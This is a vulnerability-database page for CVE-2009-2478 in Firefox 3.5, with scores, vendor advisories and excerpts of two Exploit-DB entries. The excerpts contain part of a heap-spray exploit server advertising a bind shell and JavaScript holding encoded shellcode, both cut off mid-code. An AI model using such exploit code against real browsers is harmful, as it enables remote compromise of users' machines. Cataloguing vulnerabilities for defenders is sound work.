CVE-2009-2478
published 2009-07-16CVE-2009-2478: Mozilla Firefox 3.5 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors, related to a…
PriorityP423medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
7.81%
93.9th percentile
Mozilla Firefox 3.5 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors, related to a "flash bug."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
firefox 3.5 various flaws
vendor_redhat·2009-07-14·CVSS 5.0
CVE-2009-2478 [MEDIUM] firefox 3.5 various flaws
firefox 3.5 various flaws
Mozilla Firefox 3.5 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors, related to a "flash bug."
GHSA
GHSA-j8jf-vmrq-6wf6: Mozilla Firefox 3
ghsa_unreviewed·2022-05-02
CVE-2009-2478 [MEDIUM] GHSA-j8jf-vmrq-6wf6: Mozilla Firefox 3
Mozilla Firefox 3.5 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors, related to a "flash bug."
No detection rules found.
Exploit-DB
Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1)
exploitdb·2009-07-17
CVE-2009-2478 Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1)
Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1)
---
#!/usr/bin/env python
#######################################################
#
# FireFox 3.5 Heap Spray Exploit
# Originally discovered by: Simon Berry-Bryne
# Pythonized by: David Kennedy (ReL1K) @ SecureState
#
#######################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
class myRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.printCustomHTTPResponse(200)
if self.path == "/":
target=self.client_address[0]
self.wfile.write("""
Firefox 3.5 Vulnerability
Firefox 3.5 Heap Spray Exploit
Discovered by: SBerry aka Simon Berry-Byrne
Pythonized: David Kennedy (ReL1K) at SecureState
Bind Shell Port: 5500
Encoding: Shikata_Ga_
Exploit-DB
Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow
exploitdb·2009-07-13
CVE-2009-2478 Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow
Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow
---
Firefox 3.5 Vulnerability
Firefox 3.5 Heap Spray Vulnerabilty
Author: SBerry aka Simon Berry-Byrne
Thanks to HD Moore for the insight and Metasploit for the payload
Loremipsumdoloregkuw
Loremipsumdoloregkuwiert
Loremikdkw
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u448
https://bugzilla.mozilla.org/show_bug.cgi?id=502648https://bugzilla.mozilla.org/show_bug.cgi?id=503286https://www.redhat.com/archives/fedora-package-announce/2009-July/msg00909.htmlhttps://bugzilla.mozilla.org/show_bug.cgi?id=502648https://bugzilla.mozilla.org/show_bug.cgi?id=503286https://www.redhat.com/archives/fedora-package-announce/2009-July/msg00909.html
2009-07-16
Published